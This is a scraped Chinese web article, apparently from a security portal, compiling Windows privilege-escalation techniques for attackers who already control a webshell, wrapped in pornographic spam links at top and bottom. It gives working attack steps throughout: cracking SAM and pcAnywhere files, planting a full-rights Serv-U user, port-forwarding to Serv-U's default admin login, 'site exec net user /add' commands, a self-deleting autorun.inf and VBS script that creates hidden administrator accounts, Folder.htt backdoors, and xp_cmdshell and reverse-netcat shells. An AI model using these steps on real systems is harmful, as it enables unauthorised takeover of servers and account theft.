成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

最全的Webshell提權方法總結

安全 應用安全
在得到了一個Webshell之后,如果能進一步利用系統(tǒng)的配置不當取得更高的權限,一直是廣大黑友們所津津樂道的話題,也是高手和菜鳥間最大的區(qū)別。本文將從一個大角度總括當前流行的各種提權方法,希望對大家有所啟發(fā),起到一個拋磚引玉的作用。

在得到了一個Webshell之后,如果能進一步利用系統(tǒng)的配置不當取得更高的權限,一直是廣大黑友們所津津樂道的話題,也是高手和菜鳥間最大的區(qū)別。本文將從一個大角度總括當前流行的各種提權方法,希望對大家有所啟發(fā),起到一個拋磚引玉的作用。

WEBSHELL權限提升技巧 
c: d: e:..... 
C:\Documents and Settings\All Users\「開始」菜單\程序\ 
看這里能不能跳轉,我們從這里可以獲取好多有用的信息比如Serv-U的路徑, 
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 
看能否跳轉到這個目錄,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密碼,登陸 
c:\Program Files\serv-u\ 
C:\WINNT\system32\config\ 
下它的SAM,破解密碼 
c:\winnt\system32\inetsrv\data\ 
是erveryone 完全控制,很多時候沒作限制,把提升權限的工具上傳上去,然后執(zhí)行 
c:\prel 
C:\Program Files\Java Web Start\ 
c:\Documents and Settings\ 
C:\Documents and Settings\All Users\ 
c:\winnt\system32\inetsrv\data\ 
c:\Program Files\ 
c:\Program Files\serv-u\ BBS.bitsCN.com國內最早的網管論壇 
C:\Program Files\Microsoft SQL Server\ 
c:\Temp\ 
c:\mysql\(如果服務器支持PHP) 
c:\PHP(如果服務器支持PHP) 
運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權限 
還可以用這段代碼試提升,好象不是很理想的 
如果主機設置很變態(tài),可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs等木馬。 
根目錄下隱藏autorun.inf 
C:\PROGRAM FILES\KV2004\ 綁 
D:\PROGRAM FILES\RISING\RAV\ 
C:\Program Files\Real\RealServer\ 
rar 
Folder.htt與desktop.ini 
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下 
replace 替換法 捆綁 
腳本 編寫一個啟動/關機腳本 重起 
刪SAM :( 錯 
CAcls命令 
FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak 
Ring的權限提升21大法! 
以下全部是本人提權時候的總結 很多方法至今沒有機會試驗也沒有成功,但是我是的確看見別人成功過 
的。本人不才,除了第一種方法自己研究的,其他的都是別人的經驗總結。希望對朋友有幫助! 

1.radmin連接法 
條件是你權限夠大,對方連防火墻也沒有。封裝個radmin上去,運行,開對方端口,然后radmin上去  。本人從來米成功過,端口到是給對方打開了。

2.paanywhere 
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF 
文件,在本地安裝pcanywhere上去 

3.SAM破解 
C:\WINNT\system32\config\ 下他的SAM 破解之 

4.SU密碼奪取 
C:\Documents and Settings\All Users\「開始」菜單\程序\ 
引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉 
進去后,如果有權限修改ServUDaemon.ini,加個用戶上去,密碼為空 
[USER=WekweN|1] 
Password= 
HomeDir=c:\ 
TimeOut=600 
Maintenance=System 
Access1=C:\|RWAMELCDP 
Access1=d:\|RWAMELCDP 
Access1=f:\|RWAMELCDP 
SKEYvalues= 
這個用戶具有最高權限,然后我們就可以ftp上去 quote site exec xxx 來提升權限 

5.c:\winnt\system32\inetsrv\data\ 
引用:就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去, 
然后執(zhí)行 

6.SU溢出提權 
這個網上教程N多 不詳細講解了 

7.運行Csript 
引用:運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提 
升權限 
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps 
查看有特權的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 
再將asp.dll加入特權一族 
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣) 
我們現(xiàn)在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" 
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" 
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32 
\inetsrv\asp.dll" 
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了

8.腳本提權 
c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs 

9.VNC 
這個是小花的文章 HOHO 
默認情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password 

我們可以用vncx4 
破解它,vncx4使用很簡單,只要在命令行下輸入 
c:\>vncx4 -W 
然后順序輸入上面的每一個十六進制數據,沒輸完一個回車一次就行了。

10.NC提權 
給對方來個NC 但是條件是你要有足夠的運行權限 然后把它反彈到自己的電腦上 HOHO OK了 

11.社會工程學之GUEST提權 
很簡單 查看他的擁護 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵 
箱號 手機號 盡量看看 HOHO 

12.IPC空連接 
如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令 

13.替換服務 
這個不用說了吧?個人感覺相當復雜 

14.autorun .inf 
autorun=xxx.exe 這個=后面自己寫 HOHO 加上只讀、系統(tǒng)、隱藏屬性 傳到哪個盤都可以的 不相信 
他不運行 

15.desktop.ini與Folder.htt 
引用:首先,我們現(xiàn)在本地建立一個文件夾,名字不重要,進入它,在空白處點右鍵,選擇"自定義 
文件夾"(xp好像是不行的)一直下點,默認即可。完成后,你就會看到在此目錄下多了兩個名為Folder 
setting的文件架與desktop.ini的文件,(如果你看不到,先取消"隱藏受保護的操作系統(tǒng)文件")然后 
我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼: ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的后門文件名"> 
然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方 
任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執(zhí)行了我們的后門 

16.su覆蓋提權 
本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重 
起一下Serv-U,于是你上面的所有配置都與他的一模一樣了 

17.SU轉發(fā)端口 
43958這個是 Serv -U 的本地管理端口。FPIPE.exe上傳他,執(zhí)行命令: Fpipe –v –l 3333 –r 
43958 127.0.0.1 意思是將4444端口映射到43958端口上。 然后就可以在本地安裝一個Serv-u,新建一個 
服務器,IP填對方IP,帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 連接上后你就可以管理他的 
Serv-u了 

18.SQL帳戶密碼泄露 
如果對方開了MSSQL服務器,我們就可以通過用SQL連接器加管理員帳號(可以從他的連接數據庫的 
ASP文件中看到),因為MSSQL是默認的SYSTEM權限。 
引用:對方沒有刪除xp_cmdshell 方法:使用Sqlexec.exe,在host 一欄中填入對方IP,User與Pass DL.bitsCN.com網管軟件下載 
中填入你所得到的用戶名與密碼。format選擇xp_cmdshell"%s"即可。然后點擊connect,連接上后就可 
以在CMD一欄中輸入你想要的CMD命令了 

19.asp.dll 
引用:因為asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定相同 

我們現(xiàn)在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" 
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" 
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32 
\inetsrv\asp.dll" 
好了,現(xiàn)在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去 
了,注意,用法中的get和set,一個是查看一個是設置.還有就是你運行上面的你要到 
C:\Inetpub\AdminScripts>這個目錄下. 
那么如果你是一個管理員,你的機子被人用這招把asp提升為system權限,那么,這時,防的方法就是把 
asp.dll T出特權一族,也就是用set這個命令,覆蓋掉剛才的那些東東. 

20.Magic Winmail 
前提是你要有個webshell 引用:http://www.eviloctal.com/forum/read.php?tid=3587這里去看吧 

21.DBO…… 
其實 提升權限的方式很多的 就看大家怎么利用了 HOHO 加油吧 將服務器控制到底! 
感謝noangel 
WEBSHELL權限提升 
動網上傳漏洞,相信大家拿下不少肉雞吧,但是都是WEBSHELL,不能拿到系統(tǒng)權限,要如何拿到系統(tǒng)權限呢?這正是我們這次要討論的內容 
OK,進入我的WEBSHELL 
啊哈,不錯,雙CPU,速度應該跟的上,不拿下你我怎么甘心啊 
輸入密碼,進入到里面看看,有什么好東西沒有,翻了下,好像也沒有什么特別的東西,看看能不能進到其他的盤符,點了下C盤,不錯不錯,可以進去,這樣提升就大有希望了

一 serv-u提升 
OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,記得有次看到SERV-U有默認的用戶名和密碼,但是監(jiān)聽的端口是43958,而且是只有本地才能訪問的,但是我們有端口轉發(fā)工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21 
顯示竟然是3.0的,唉,不得不說這個管理員真的不稱職。后來完畢后掃描了下,也只有FTP的洞沒有補。既然是這樣,我們就開始我們的提升權限了 
上傳FPIPE,端口轉發(fā)工具, 圖三 
在運行CMD命令里輸入d:\\wwwroot\\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本機的43598端口轉發(fā)到81端口 

然后打開我們自己機子上的SERV-U,點Serv-U服務器,點菜單欄上的的服務器,點新建服務器,然后輸入IP,輸入端口,記得端口是剛剛我們轉發(fā)的 81端口。服務名稱隨便你喜歡,怎么樣都行。然后是用戶名:LocalAdministrator 密碼:#l@$ak#.lk;0@P (密碼都是字母) 
確定,然后點剛剛建的服務器,然后就可以看到已有的用戶,自己新建一個用戶,把所有權限加上。也不鎖定根目錄 
接下來就是登陸了,登陸FTP一定要在CMD下登陸, 
進入后一般命令和DOS一樣,添加用戶的時候 
ftp>quote site exec net.exe user hk pass /add 
ftp>quote site exec net.exe localgroup administrators hk/add 
如果對方開了3389的話,就不用我教你怎么做了,沒開的話,新建立IPC連接,在上傳木馬或者是開啟3389的工具 
二 
auto.ini 加 SHELL.VBS 
autorun.inf 
[autorun] 
open=shell.vbs 
shell.vbs 
dim wsh 
set wsh=createObject("WScript.Shell") 
wsh.run "net user guest /active:yes",0 
wsh.run "net user guest 520ls",0 
wsh.run "net localgroup administrators guest /add",0 
wsh.run "net user hkbme 520ls /add",0 


wsh.run "net localgroup administrators hkbme /add",0 
wsh.run "cmd.exe /c del autorun.inf",0 
wsh.run "cmd.exe /c del shell.vbs",0 

但是這樣要可以訪問到對方的根目錄。將這兩個文件放到對方硬盤的根目錄下。當然你也可以直接執(zhí)行木馬程序,還要一個木馬程序,但是語句就和最后兩句一樣,通過CMD執(zhí)行木馬程序 

三 
Folder.htt與desktop.ini 
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下,覺得一個不夠,可以多放幾個 
Folder.htt添加代碼 
 
 
但是后門和這兩個文件必須要放到一塊,有點問題,可以結合啟動VBS,運行結束后,刪除上傳的后門.就是CODEBASE="shell.vbs".shell寫法如上 

四 
replace 
替換法,可以替換正在執(zhí)行的文件。用這個幾乎可以馬上得到權限,但是我沒有做過試驗,可以試下,將對方正在執(zhí)行的文件替換為和它文件名一樣的,捆綁了木馬的。為什么不直接替換木馬呢?如果替換的是關鍵程序,那不是就直接掛了?所以還是捆綁好點 www.bitsCN.net網管博客等你來搏
格式 
REPLACE [drive1:][path1]filename [drive2:][path2] [/A] 
[/R] [/W] 
REPLACE [drive1:][path1]filename [drive2:][path2] 
[/R] [/S] [/W] 
 [drive1:][path1]filename 指定源文件。 
 [drive2:][path2] 指定要替換文件的 
  目錄。 
 /A 把新文件加入目標目錄。不能和 
  /S 或 /U 命令行開關搭配使用。 
 /P 替換文件或加入源文件之前會先提示您 
  進行確認。 
 /R 替換只讀文件以及未受保護的 
  文件。 
 /S 替換目標目錄中所有子目錄的文件。 
  不能與 /A 命令選項 
  搭配使用。 
 /W 等您插入磁盤以后再運行。 
 /U 只會替換或更新比源文件日期早的文件。 
  不能與 /A 命令行開關搭配使用 
這個命令沒有試驗過,看能不能替換不能訪問的文件夾下的文件,大家可以試驗下 

五 
腳本 
編寫一個啟動/關機腳本配置文件scripts.ini,這個文件名是固定的,不能改變。內容如下: 
[Startup] 


0CmdLine=a.bat 
0Parameters= 
將文件scripts.ini保存到"C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts" 
A.BAT的內容可以是NET USER yonghu mima 
也可以是NET USER ADMINistrator XXX 
這樣可以恢復你想要得任意用戶名的密碼,也可以自己增加新的用戶,但是要依賴重啟,還有就是對SYSTEM32有寫的權限

六 
SAM 
如果可以訪問對方的SYSTEM32的話,刪除對方的SAM文件,等他重啟以后就是ADMIN用戶密碼為空 
突然又有了想法,可以用REPLACE命令替換的嗎,可以把你的SAM文件提取出來,上傳到他的任意目錄下,然后替換。不過不知道如果對SYSTEM32沒有權限訪問的話,能不能實現(xiàn)替換。

【編輯推薦】

  1. 黑客網絡入侵大型網站的完整思路
  2. php注入后的提權
責任編輯:Oo小孩兒 來源: 安全中國網
相關推薦

2023-06-11 17:24:26

2019-12-01 22:34:42

提權web安全漏洞

2016-12-12 09:11:20

2022-03-10 09:41:15

漏洞Linux內核

2011-03-07 11:36:23

FileZillaSe

2013-10-18 10:10:45

Linux漏洞代碼提權

2021-01-13 08:14:36

Windows提權漏洞攻擊

2021-01-06 08:04:30

Linux方式提權

2013-11-29 15:34:00

2021-05-01 20:52:30

漏洞網絡安全網絡攻擊

2015-09-22 10:25:13

2010-11-02 21:17:17

2015-03-13 10:06:55

2024-07-31 08:46:10

2009-07-25 17:24:45

2012-11-15 13:44:36

Plesk密碼提權密碼

2024-01-15 00:25:59

2018-07-05 10:44:09

Windows提權漏洞

2017-03-25 20:30:15

2009-08-07 10:18:13

Linux反彈CmdLine S技巧
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 欧美专区在线 | 午夜精品在线 | 黄色欧美视频 | 色www精品视频在线观看 | 毛片a级| 男女羞羞的网站 | 国产美女在线精品免费 | 国产精品久久久久久久久久久免费看 | 理论片午午伦夜理片影院 | 国产日韩欧美一区 | 在线观看日韩av | 一本色道久久综合亚洲精品高清 | 一区二区伦理电影 | 日韩精品一区二区三区中文字幕 | 日韩综合在线 | 国内久久精品 | 91免费在线看 | 99re在线视频 | 亚洲欧美日韩中文在线 | 色婷婷av久久久久久久 | 中文区中文字幕免费看 | 日韩欧美亚洲综合 | 成人欧美一区二区三区黑人孕妇 | 97视频人人澡人人爽 | 在线精品亚洲欧美日韩国产 | 99精品一区 | 久久精品99久久 | 99久久国产综合精品麻豆 | 亚洲午夜av久久乱码 | 韩日在线观看视频 | 色网站在线 | 女朋友的闺蜜3韩国三级 | 欧美网站一区 | 中文字幕亚洲区一区二 | 美女三区| 国产精品国产精品国产专区不片 | 欧美电影免费观看高清 | 色欧美综合 | 日韩1区 | 日本aa毛片a级毛片免费观看 | 91亚洲国产成人久久精品网站 |